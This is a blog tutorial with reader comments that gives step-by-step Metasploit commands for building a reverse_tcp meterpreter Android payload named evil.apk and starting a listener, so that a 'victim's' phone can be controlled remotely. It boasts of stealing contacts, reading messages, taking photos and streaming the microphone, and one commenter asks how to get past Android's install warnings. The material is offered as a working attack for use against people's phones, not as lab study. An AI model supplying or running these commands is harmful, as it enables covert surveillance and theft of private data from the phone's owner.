How to hack Android phone using Kali Linux or Ubuntu – Meterpreter Android Commands

How to hack Android phone using Kali Linux or Ubuntu

Hey friends , Today I am telling you a little dangerous trick i.e. to hack android phone using Kali Linux. Using the tools of Kali Linux we can control a Android device remotely. But the phone must be having a active Internet connection.

How to hack Android phone – Kali Linux Android Hack Armitage

To do this you have to create a custom tool that we will create by using some codes. You don’t need to be an expert & the used coding is not so much. You should be a little familiar to Linux OS. The recommended Linux OS are  Kali Linux and Ubuntu.


What we gonna do is to create a deploy application by Kali Linux Metasploit which we have to install on the victim’s Android device.
After you will install the application on the Android device , you will be able to control the phone from anywhere.

Things you Need

  • A Desktop or Laptop running on Kali Linux. if you have a Windows PC then you have to use a VMWare & install Kali Linux on it.
  • An Active Internet Connection.
  • An Android device to do your practical.

If you will successfully complete the practical then you can do the following things in your device.

  • Copy Contacts & other personal information
  • Use the camera for clicking a picture.
  • Live voice streaming using microphone.
  • Read all messages
  • Stream Videos & access all the files.

MSFPayload Android Meterpreter

So be ready with all your devices, follow these steps below.

  1. Open a terminal in your Kali Linux.
  2. Type the code & press Enter. :~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk
  3. In the code you have to replace the youripaddress with your IP Address.
  4. To know your IP address you can use the command ifconfig (Command will work only if you are connected to the Internet).
  5. Now open another terminal & type msfconsole and press Enter.
  6. With msfconsole your metasploit will be downloaded. Be patient on it.
  7. After the download will be done. Type the following code in the

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost youripaddress (the same ip address you entered in step1).
set lport 8080 (the same port you used in step1).
exploit
this invokes to listen the IP address to listen at Port 8080.

  1. Now you have to copy the evil.apk to the victim device.
  2. After the app will be installed in the phone you will see the device is connected in your console.
  3. Now you can use the device as you wish. Type help to know more commands.
  4. All done, thank you for reading.

That’s it for now. If you like the article please give your feedback & ask your doubts to hack your Android phone. If you like the information please like our Facebook Page or Subscribe to us for our Daily Updates in your Inbox. Thank You.

2 Comments

  1. Deepin 15.4 Released with so many new features – New Deepin Linux
    December 23, 2019

    […] Also Read : How to hack Android phone using Kali Linux or Ubuntu […]

  2. Alyq
    April 5, 2020

    Is there a way a bypass the Android saying that it is not safe to download? Newer phones will have a few warnings not to download it.

Leave a Comment